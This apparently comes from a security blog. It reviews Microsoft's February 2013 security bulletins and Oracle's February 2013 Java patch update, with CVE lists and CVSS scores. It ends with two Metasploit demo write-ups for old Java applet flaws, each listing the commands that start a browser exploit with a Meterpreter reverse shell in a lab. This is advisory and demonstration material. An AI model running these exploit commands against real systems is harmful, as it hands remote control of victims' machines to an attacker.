Tag Archives: Oracle

Microsoft February 2013 Patch Tuesday Review

Microsoft has release, the 12 February 2013, during his February Patch Tuesday, one updated security advisory and twelve security bulletins. On the twelve security bulletins five of them have a Critical security rating.

Microsoft Security Advisory 2755801

MSA-2755801,released during September 2012, has been updated. The security advisory is regarding updates for vulnerabilities in Adobe Flash Player in Internet Explorer 10. Update KB2805940 has been released for supported editions of Windows 8, Windows Server 2012, and Windows RT. The update addresses the vulnerabilities described in Adobe Security bulletin APSB13-05.

MS13-009 – Cumulative Security Update for Internet Explorer

MS13-009 security update, classified as Critical, allowing remote code execution, is the fix for 13 reported vulnerabilities. CVE-2013-0015 (4.3 CVSS base score) was discovered and reported by Masato Kinugawa. CVE-2013-0018 (9.3 CVSS base score) and CVE-2013-0022 (9.3 CVSS base score) were discovered and privately reported by OmairCVE-2013-0019 (9.3 CVSS base score) was discovered and privately reported by SkyLined, working with HP’s Zero Day InitiativeCVE-2013-0020 (9.3 CVSS base score) was discovered and privately reported by Arthur Gerkis, working with the Exodus Intelligence, and by Stephen Fewer of Harmony SecurityCVE-2013-0021 (9.3 CVSS base score) was discovered and privately reported by Tencent PC Manager. CVE-2013-0023 (9.3 CVSS base score) was discovered and privately reported by Arthur Gerkis, working with HP’s Zero Day InitiativeCVE-2013-0024 (9.3 CVSS base score) was discovered and privately reported by an anonymous researcher, working with HP’s Zero Day InitiativeCVE-2013-0025 (9.3 CVSS base score) and CVE-2013-0028 (9.3 CVSS base score) were discovered and privately reported by Scott Bell of Security-Assessment.comCVE-2013-0026 (9.3 CVSS base score) was discovered and privately reported by  Jose A Vazquez of Yenteasy Security Research, working with the Exodus Intelligence. CVE-2013-0027 (9.3 CVSS base score) was discovered and privately reported by Mark Yason of IBM X-Force. CVE-2013-0029 (9.3 CVSS base score) was discovered and privately reported by Stephen Fewer of Harmony Security and [email protected], working with HP’s Zero Day Initiative.

MS13-010 – Vulnerability in Vector Markup Language Could Allow Remote Code Execution

MS13-010 security update, classified as Critical, allowing remote code execution, is the fix for one privately reported vulnerability. CVE-2013-0030 (9.3 CVSS base score) was discovered and privately reported by an unknown security researcher.

MS13-011 – Vulnerability in Media Decompression Could Allow Remote Code Execution

MS13-011 security update, classified as Critical, allowing remote code execution, is the fix for one publicly reported vulnerability. CVE-2013-0077 (9.3 CVSS base score) was discovered and reported by Tencent Security Team.

MS13-012 – Vulnerabilities in Microsoft Exchange Server Could Allow Remote Code Execution

MS13-012 security update, classified as Critical, allowing remote code execution, is the fix for two publicly reported vulnerability linked to Oracle Outside In vulnerabilities fixed during January 2013 Critical Patch Update. These vulnerabilities are CVE-2013-0418 (6.8 CVSS base score) and CVE-2013-0393 (6.8 CVSS base score).

MS13-020 – Vulnerability in OLE Automation Could Allow Remote Code Execution

MS13-020 security update, classified as Critical, allowing remote code execution, is the fix for one publicly reported vulnerability. CVE-2013-1313 (9.3 CVSS base score) was discovered and reported by an anonymous researcher, working with HP’s Zero Day Initiative.

MS13-013 – Vulnerabilities in FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution

MS13-013 security update, classified as Important, allowing remote code execution, is the fix for two publicly reported vulnerability linked to Oracle Outside In vulnerabilities fixed during January 2013 Critical Patch Update. These vulnerabilities are CVE-2012-3214 (2.1 CVSS base score) and CVE-2012-3217 (2.1 CVSS base score).

MS13-014 – Vulnerabilities in FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution

MS13-014 security update, classified as Important, allowing denial of service, is the fix for one privately reported vulnerability. CVE-2013-1281 (7.1 CVSS base score) was discovered and privately reported by an anonymous researcher.

MS13-015 – Vulnerability in .NET Framework Could Allow Elevation of Privilege

MS13-015 security update, classified as Important, allowing elevation of privileges, is the fix for one privately reported vulnerability. CVE-2013-0073 (10.0 CVSS base score) was discovered and privately reported by James Forshaw of Context Information Security.

MS13-016 – Vulnerabilities in Windows Kernel-Mode Driver Could Allow Elevation of Privilege

MS13-016 security update, classified as Important, allowing elevation of privileges, is the fix for 30 privately reported vulnerability. CVE-2013-1248 (4.9 CVSS base score) and CVE-2013-1249 (4.9 CVSS base score) were discovered and privately reported by Mateusz “j00ru” Jurczyk of Google Inc, and Tencent Security Team. CVE-2013-1251 (4.9 CVSS base score), CVE-2013-1252 (4.9 CVSS base score) and CVE-2013-1253 (4.9 CVSS base score) were discovered and privately reported by Gynvael Coldwind and Mateusz “j00ru” Jurczyk of Google Inc. CVE-2013-1250 (4.9 CVSS base score), CVE-2013-1254 (4.9 CVSS base score), CVE-2013-1255 (4.9 CVSS base score), CVE-2013-1256 (4.9 CVSS base score), CVE-2013-1257 (4.9 CVSS base score), CVE-2013-1258 (4.9 CVSS base score), CVE-2013-1259 (4.9 CVSS base score), CVE-2013-1260 (4.9 CVSS base score), CVE-2013-1261 (4.9 CVSS base score), CVE-2013-1262 (4.9 CVSS base score), CVE-2013-1263 (4.9 CVSS base score), CVE-2013-1264 (4.9 CVSS base score), CVE-2013-1265 (4.9 CVSS base score), CVE-2013-1266 (4.9 CVSS base score), CVE-2013-1267 (4.9 CVSS base score), CVE-2013-1268 (4.9 CVSS base score), CVE-2013-1269 (4.9 CVSS base score), CVE-2013-1270 (4.9 CVSS base score), CVE-2013-1271 (4.9 CVSS base score), CVE-2013-1272 (4.9 CVSS base score), CVE-2013-1273 (4.9 CVSS base score), CVE-2013-1274 (4.9 CVSS base score), CVE-2013-1275 (4.9 CVSS base score), CVE-2013-1276 (4.9 CVSS base score) and CVE-2013-1277 (4.9 CVSS base score) were discovered and privately reported by Mateusz “j00ru” Jurczyk of Google Inc.

MS13-017 – Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege

MS13-017 security update, classified as Important, allowing elevation of privileges, is the fix for three privately reported vulnerability. CVE-2013-1278 (7.2 CVSS base score) and CVE-2013-1279 (7.2 CVSS base score) were discovered and privately reported by Gynvael Coldwind and Mateusz “j00ru” Jurczyk of Google Inc. CVE-2013-1280 (7.2 CVSS base score) was discovered and privately reported by an unknown security researcher.

MS13-018 – Vulnerability in TCP/IP Could Allow Denial of Service

MS13-018 security update, classified as Important, allowing denial of service, is the fix for a privately reported vulnerability. CVE-2013-0075 (7.1 CVSS base score) was discovered and privately reported by an unknown security researcher.

MS13-019 – Vulnerability in Windows Client/Server Run-time Subsystem (CSRSS) Could Allow Elevation of Privilege

MS13-019 security update, classified as Important, allowing elevation of privileges, is the fix for a publicly reported vulnerability. CVE-2013-0076 (7.2 CVSS base score) was discovered and privately reported by Max DeLiso.

Oracle Java Critical Patch Update February 2013 Review

Oracle has provide his Java Critical Patch Update (CPU) for February 2013 how has been released on Friday, February 1. Initial release date was planned for 19 February but Oracle has push this update earlier due to the active exploitation of one of the critical vulnerabilities in the wild. On the 50 security vulnerabilities, fixed in this CPU, 49 of them may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0. 34 vulnerabilities have a CVSS base score upper or equal to 7.0.

It is actually not clear which of these vulnerability is exploited in the wild, but it could be related to CVE-2013-1489, an issue publicly reported and regarding Java SE7 security features introduced in Java SE7 Update 10.

As you may know Oracle is using CVSS 2.0 (Common Vulnerability Scoring System) in order to score the reported vulnerabilities. But as you also may know security researchers disagree with the usage of CVSS by Oracle. Oracle play with CVSS score by creating a “Partial+” impact rating how don’t exist in CVSS 2.0, and by interpreting the “Complete” rating in a different way than defined in CVSS 2.0.

Affected products are:

  • JDK and JRE 7 Update 11 and earlier
  • JDK and JRE 6 Update 38 and earlier
  • JDK and JRE 5.0 Update 38 and earlier
  • SDK and JRE 1.4.2_40 and earlier
  • JavaFX 2.2.4 and earlier

CVE-2012-1541CVE-2012-3213CVE-2012-3342CVE-2012-4301CVE-2013-0425CVE-2013-0426CVE-2013-0428CVE-2013-0436CVE-2013-0437CVE-2013-0439CVE-2013-0441CVE-2013-0442CVE-2013-0445CVE-2013-0446CVE-2013-0447CVE-2013-0450CVE-2013-1472CVE-2013-1475CVE-2013-1476CVE-2013-1477CVE-2013-1478CVE-2013-1479CVE-2013-1480CVE-2013-1481CVE-2013-1482 and CVE-2013-1483 have a CVSS base score of 10.0.

CVE-2012-4305 and CVE-2013-1474 have a CVSS base score of 9.3.

CVE-2012-1543, CVE-2013-0419, CVE-2013-0423, CVE-2013-0429 and CVE-2013-0444 have a CVSS base score of 7.6.

CVE-2013-0351 has a CVSS base score of 7.5.

CVE-2013-0430 has a CVSS base score of 6.9.

CVE-2013-0432 has a CVSS base score of 6.4.

CVE-2013-0409, CVE-2013-0424, CVE-2013-0427, CVE-2013-0431, CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0440, CVE-2013-0448, CVE-2013-0449 and CVE-2013-1473 have a CVSS base score of 5.0.

CVE-2013-0438 has a CVSS base score of 4.3.

CVE-2013-0443 has a CVSS base score of 4.0.

CVE-2013-1489 has a CVSS base score of 0.0.

CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo

Timeline :

Vulnerability patched by Oracle in 2012 October CPU
Metasploit PoC provided the 2013-01-22

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5088
OSVDB-86352
BID-56057
Oracle October 2012 CPU
New Java Modules in Metasploit… No 0 days this time

Affected version(s) :

Oracle Java version 7 Update 7 and earlier.

Tested on Windows 8 Pro with :

Internet Explorer 10
Oracle Java 7 Update 7

Description :

This module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_method_handle
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2012-5076 Java Applet AverageRangeStatisticImpl RCE Metasploit Demo

Timeline :

Vulnerability patched by Oracle in 2012 October CPU
Vulnerability discovered exploited in the wild by kafeine the 2012-11-09
First Metasploit PoC provided the 2012-11-11
Second Metasploit PoC provided the 2013-01-22

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5076
OSVDB-86363
BID-56054
Cool EK : “Hello my friend…”
Oracle October 2012 CPU
New Java Modules in Metasploit… No 0 days this time

Affected version(s) :

Oracle Java version 7 Update 7 and earlier.

Tested on Windows 8 Pro with :

Internet Explorer 10
Oracle Java 7 Update 7

Description :

This module abuses the AverageRangeStatisticImpl from a Java Applet to run arbitrary Java code outside of the sandbox, a different exploit vector than the one exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo